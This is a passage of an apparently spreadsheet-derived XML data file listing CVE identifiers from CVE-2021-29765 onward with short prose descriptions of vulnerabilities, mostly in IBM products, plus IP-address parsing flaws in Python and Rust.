    <t>IBM Sterling B2B Integrator 5.2.0.0 through 6.1.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 202268.</t>
  </si>
  <si>
    <t>CVE-2021-29765</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW940 and FW950 could allow an attacker to obtain sensitive information if they gain service access to the FSP. IBM X-Force ID: 202476.</t>
  </si>
  <si>
    <t>CVE-2021-29766</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook Premium (IBM i2 Analyze 4.3.0, 4.3.1, and 4.3.2) could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 202680.</t>
  </si>
  <si>
    <t>CVE-2021-29767</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook Premium 9.2.0, 9.2.1, and 9.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 202681.</t>
  </si>
  <si>
    <t>CVE-2021-29768</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.</t>
  </si>
  <si>
    <t>CVE-2021-29769</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook Premium (IBM i2 Analyze 4.3.0, 4.3.1, and 4.3.2)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202769.</t>
  </si>
  <si>
    <t>CVE-2021-29770</t>
  </si>
  <si>
    <t>IBM i2 Analyst's Notebook Premium (IBM i2 Analyze 4.3.0, 4.3.1, and 4.3.2) could allow an authenticated user to perform unauthorized actions due to hazardous input validation. IBM X-Force ID: 202771.</t>
  </si>
  <si>
    <t>CVE-2021-29771</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-29772</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.11 could allow a user to potentially inject code due to unsanitized user input. IBM X-Force ID: 202774.</t>
  </si>
  <si>
    <t>CVE-2021-29773</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.6 and 11.3 could allow a remote authenticated attacker to obtain sensitive information or modify user details caused by an insecure direct object vulnerability (IDOR). IBM X-Force ID: 202865.</t>
  </si>
  <si>
    <t>CVE-2021-29774</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products could allow an authenticated user to obtain elevated privileges under certain configurations. IBM X-Force ID: 203025.</t>
  </si>
  <si>
    <t>CVE-2021-29775</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 19.0.03 and 20.0 and IBM Cloud Pak for Automation 20.0.3-IF002 and 21.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 203029.</t>
  </si>
  <si>
    <t>CVE-2021-29776</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information from another user's dashboard providing the dashboard ID of that user. IBM X-Force ID: 203030.</t>
  </si>
  <si>
    <t>CVE-2021-29777</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5, under specific circumstance of a table being dropped while being accessed in another session, could allow an authenticated user to cause a denial of srevice IBM X-Force ID: 203031.</t>
  </si>
  <si>
    <t>CVE-2021-29779</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 could allow an attacker to obtain sensitive information due to the server performing key exchange without entity authentication on inter-host communications using man in the middle techniques. IBM X-Force ID: 203033.</t>
  </si>
  <si>
    <t>CVE-2021-29780</t>
  </si>
  <si>
    <t>IBM Resilient OnPrem v41.1 of IBM Security SOAR could allow an authenticated user to perform actions that they should not have access to due to improper input validation. IBM X-Force ID: 203085.</t>
  </si>
  <si>
    <t>CVE-2021-29781</t>
  </si>
  <si>
    <t>IBM Partner Engagement Manager 2.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 203091.</t>
  </si>
  <si>
    <t>CVE-2021-29784</t>
  </si>
  <si>
    <t>IBM i2 Analyze 4.3.0, 4.3.1, and 4.3.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 203168.</t>
  </si>
  <si>
    <t>CVE-2021-29785</t>
  </si>
  <si>
    <t>IBM Security SOAR V42 and V43could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 203169.</t>
  </si>
  <si>
    <t>CVE-2021-29786</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products stores user credentials in clear text which can be read by an authenticated user. IBM X-Force ID: 203172.</t>
  </si>
  <si>
    <t>CVE-2021-29788</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises (All versions) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 203310.</t>
  </si>
  <si>
    <t>CVE-2021-29790</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises (All versions) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 203440.</t>
  </si>
  <si>
    <t>CVE-2021-29792</t>
  </si>
  <si>
    <t>IBM Event Streams 10.0, 10.1, 10.2, and 10.3 could allow a user the CA private key to create their own certificates and deploy them in the cluster and gain privileges of another user. IBM X-Force ID: 203450.</t>
  </si>
  <si>
    <t>CVE-2021-29794</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/Impact 7.1.0.20 and 7.1.0.21 uses an insecure SSH server configuration which enables weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 203556.</t>
  </si>
  <si>
    <t>CVE-2021-29795</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW860, FW930, FW940, and FW950 could allow a local user to create a specially crafted sequence of hypervisor calls from a partition that could crash the system. IBM X-Force ID: 203557.</t>
  </si>
  <si>
    <t>CVE-2021-29798</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 203734.</t>
  </si>
  <si>
    <t>CVE-2021-29799</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises (All versions) could allow an authenticated user to obtain sensitive information due to improper client side validation. IBM X-Force ID: 203738.</t>
  </si>
  <si>
    <t>CVE-2021-29800</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI and IBM Jazz for Service Management 1.1.3.10 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2021-29801</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the kernel to gain root privileges. IBM X-Force ID: 203977.</t>
  </si>
  <si>
    <t>CVE-2021-29802</t>
  </si>
  <si>
    <t>IBM Security SOAR performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.</t>
  </si>
  <si>
    <t>CVE-2021-29803</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204164.</t>
  </si>
  <si>
    <t>CVE-2021-29804</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204262.</t>
  </si>
  <si>
    <t>CVE-2021-29805</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204263.</t>
  </si>
  <si>
    <t>CVE-2021-29806</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204264.</t>
  </si>
  <si>
    <t>CVE-2021-29807</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204265.</t>
  </si>
  <si>
    <t>CVE-2021-29808</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204269.</t>
  </si>
  <si>
    <t>CVE-2021-29809</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204270.</t>
  </si>
  <si>
    <t>CVE-2021-29810</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204279.</t>
  </si>
  <si>
    <t>CVE-2021-29811</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 stores user credentials in plain clear text which can be read by an authenticated admin user. IBM X-Force ID: 204329.</t>
  </si>
  <si>
    <t>CVE-2021-29812</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204330.</t>
  </si>
  <si>
    <t>CVE-2021-29813</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204331.</t>
  </si>
  <si>
    <t>CVE-2021-29814</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204334.</t>
  </si>
  <si>
    <t>CVE-2021-29815</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204340.</t>
  </si>
  <si>
    <t>CVE-2021-29816</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204341.</t>
  </si>
  <si>
    <t>CVE-2021-29817</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204343.</t>
  </si>
  <si>
    <t>CVE-2021-29818</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204345.</t>
  </si>
  <si>
    <t>CVE-2021-29819</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204346.</t>
  </si>
  <si>
    <t>CVE-2021-29820</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204347.</t>
  </si>
  <si>
    <t>CVE-2021-29821</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management and IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204348.</t>
  </si>
  <si>
    <t>CVE-2021-29822</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204349.</t>
  </si>
  <si>
    <t>CVE-2021-29823</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204465.</t>
  </si>
  <si>
    <t>CVE-2021-29824</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to priviledge escalation where a lower level user could have read access to to the 'Data Connections' page to which they don't have access. IBM X-Force ID: 204468.</t>
  </si>
  <si>
    <t>CVE-2021-29825</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) could disclose sensitive information when using ADMIN_CMD with LOAD or BACKUP. IBM X-Force ID: 204470.</t>
  </si>
  <si>
    <t>CVE-2021-29831</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 204775.</t>
  </si>
  <si>
    <t>CVE-2021-29832</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204824.</t>
  </si>
  <si>
    <t>CVE-2021-29833</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204825.</t>
  </si>
  <si>
    <t>CVE-2021-29834</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, 19.0.0.3,20.0.0.1, 20.0.0.2, and 21.0.2 and IBM Business Process Manager 8.5 and 8.6 are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204832.</t>
  </si>
  <si>
    <t>CVE-2021-29835</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204833.</t>
  </si>
  <si>
    <t>CVE-2021-29836</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0. through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204912.</t>
  </si>
  <si>
    <t>CVE-2021-29837</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204913.</t>
  </si>
  <si>
    <t>CVE-2021-29838</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 3.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.</t>
  </si>
  <si>
    <t>CVE-2021-29841</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205045.</t>
  </si>
  <si>
    <t>CVE-2021-29842</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 and Liberty 17.0.0.3 through 21.0.0.9 could allow a remote user to enumerate usernames due to a difference of responses from valid and invalid login attempts. IBM X-Force ID: 205202.</t>
  </si>
  <si>
    <t>CVE-2021-29843</t>
  </si>
  <si>
    <t>IBM MQ 9.1 LTS, 9.1 CD, 9.2 LTS, and 9.2CD is vulnerable to a denial of service attack caused by an issue processing message properties. IBM X-Force ID: 205203.</t>
  </si>
  <si>
    <t>CVE-2021-29844</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.</t>
  </si>
  <si>
    <t>CVE-2021-29845</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 3.0 could allow an authenticated user to perform unauthorized actions due to improper input validation. IBM X-Force ID: 205255.</t>
  </si>
  <si>
    <t>CVE-2021-29846</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 3.0 could allow an authenticated user to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 205256.</t>
  </si>
  <si>
    <t>CVE-2021-29847</t>
  </si>
  <si>
    <t>BMC firmware (IBM Power System S821LC Server (8001-12C) OP825.50) configuration changed to allow an authenticated user to open an insecure communication channel which could allow an attacker to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 205267.</t>
  </si>
  <si>
    <t>CVE-2021-29849</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205281.</t>
  </si>
  <si>
    <t>CVE-2021-29851</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote attacker to obtain sensitive information when a stack trace is returned in the browser. IBM X-Force ID: 205527.</t>
  </si>
  <si>
    <t>CVE-2021-29852</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205528.</t>
  </si>
  <si>
    <t>CVE-2021-29853</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could expose information that could be used to to create attacks by not validating the return values from some methods or functions. IBM X-Force ID: 205529.</t>
  </si>
  <si>
    <t>CVE-2021-29854</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.1.1 and 7.6.1.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 205680.</t>
  </si>
  <si>
    <t>CVE-2021-29855</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205684.</t>
  </si>
  <si>
    <t>CVE-2021-29856</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 could allow an authenticated usre to cause a denial of service through the WebGUI Map Creation page. IBM X-Force ID: 205685.</t>
  </si>
  <si>
    <t>CVE-2021-29859</t>
  </si>
  <si>
    <t>IBM ICP4A - User Management System Component (IBM Cloud Pak for Business Automation V21.0.3 through V21.0.3-IF008, V21.0.2 through V21.0.2-IF009, and V21.0.1 through V21.0.1-IF007) could allow a user with physical access to the system to perform unauthorized actions or obtain sensitive information due to insufficient validation and recvocation another user logouting out. IBM X-Force ID: 206081.</t>
  </si>
  <si>
    <t>CVE-2021-29860</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the libc.a library to expose sensitive information. IBM X-Force ID: 206084.</t>
  </si>
  <si>
    <t>CVE-2021-29861</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in EFS to expose sensitive information. IBM X-Force ID: 206085.</t>
  </si>
  <si>
    <t>CVE-2021-29862</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 206086.</t>
  </si>
  <si>
    <t>CVE-2021-29863</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to server side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. This vulnerability is due to an incomplete fix for CVE-2020-4786. IBM X-Force ID: 206087.</t>
  </si>
  <si>
    <t>CVE-2021-29864</t>
  </si>
  <si>
    <t>IBM Security Identity Manager 6.0 and 6.0.2 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially 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206089</t>
  </si>
  <si>
    <t>CVE-2021-29865</t>
  </si>
  <si>
    <t>IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2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206091.</t>
  </si>
  <si>
    <t>CVE-2021-29867</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 could allow an authenticated to view or edit a Jupyter notebook that they should not have access to. IBM X-Force ID: 206212.</t>
  </si>
  <si>
    <t>CVE-2021-29868</t>
  </si>
  <si>
    <t>IBM i2 iBase 8.9.13 and 9.0.0 could allow a local attacker to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 206213.</t>
  </si>
  <si>
    <t>CVE-2021-29872</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Automation 21.0.1 and 21.0.2 - Business Automation Studio Component is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 206228.</t>
  </si>
  <si>
    <t>CVE-2021-29873</t>
  </si>
  <si>
    <t>IBM Flash System 900 could allow an authenticated attacker to obtain sensitive information and cause a denial of service due to a restricted shell escape vulnerability. IBM X-Force ID: 206229.</t>
  </si>
  <si>
    <t>CVE-2021-29875</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 could allow an attacker to obtain sensitive information due to a insecure third party domain access vulnerability. IBM X-Force ID: 206572.</t>
  </si>
  <si>
    <t>CVE-2021-29878</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 206581.</t>
  </si>
  <si>
    <t>CVE-2021-29880</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.4.3 GA - 7.4.3 Fix Pack 1 when using domains or multi-tenancy could be vulnerable to information disclosure between tenants by routing SIEM data to the incorrect domain. IBM X-Force ID: 206979.</t>
  </si>
  <si>
    <t>CVE-2021-29883</t>
  </si>
  <si>
    <t>IBM Standards Processing Engine (IBM Transformation Extender Advanced 9.0 and 10.0)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207090.</t>
  </si>
  <si>
    <t>CVE-2021-29888</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 207123.</t>
  </si>
  <si>
    <t>CVE-2021-29891</t>
  </si>
  <si>
    <t>IBM OPENBMC OP910 and OP940 could allow a privileged user to upload an improper site identity certificate that may cause it to lose network services. IBM X-Force ID: 207221.</t>
  </si>
  <si>
    <t>CVE-2021-29894</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.7.0.0, 1.7.1.0, 1.7.2.0, and 1.8.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 207320.</t>
  </si>
  <si>
    <t>CVE-2021-29899</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413.</t>
  </si>
  <si>
    <t>CVE-2021-29903</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.6.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 207506.</t>
  </si>
  <si>
    <t>CVE-2021-29904</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI displays user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 207610.</t>
  </si>
  <si>
    <t>CVE-2021-29905</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 207616.</t>
  </si>
  <si>
    <t>CVE-2021-29906</t>
  </si>
  <si>
    <t>IBM App Connect Enterprise Certified Container 1.0, 1.1, 1.2, 1.3, 1.4 and 1.5 could disclose sensitive information to a local user when it is configured to use an IBM Cloud API key to connect to cloud-based connectors. IBM X-Force ID: 207630.</t>
  </si>
  <si>
    <t>CVE-2021-29907</t>
  </si>
  <si>
    <t>IBM OpenPages with Watson 8.1 and 8.2 could allow an authenticated user to upload a file that could execute arbitrary code on the system. IBM X-Force ID: 207633.</t>
  </si>
  <si>
    <t>CVE-2021-29908</t>
  </si>
  <si>
    <t>The IBM TS7700 Management Interface is vulnerable to unauthenticated access. By accessing a specially-crafted URL, an attacker may gain administrative access to the Management Interface without authentication. IBM X-Force ID: 207747.</t>
  </si>
  <si>
    <t>CVE-2021-29912</t>
  </si>
  <si>
    <t>IBM Security Risk Manager on CP4S 1.7.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 207828.</t>
  </si>
  <si>
    <t>CVE-2021-29921</t>
  </si>
  <si>
    <t>In Python before 3,9,5, the ipaddress library mishandles leading zero characters in the octets of an IP address string. This (in some situations) allows attackers to bypass access control that is based on IP addresses.</t>
  </si>
  <si>
    <t>CVE-2021-29922</t>
  </si>
  <si>
    <t>library/std/src/net/parser.rs in Rust before 1.53.0 does not properly consider extraneous zero characters at the beginning of an IP address string, which (in some situations) allows attackers to bypass access control that is based on IP addresses, because of unexpected octal interpretation.</t>
  </si>
  <si>
    <t>CVE-2021-29923</t>
  </si>
  <si>
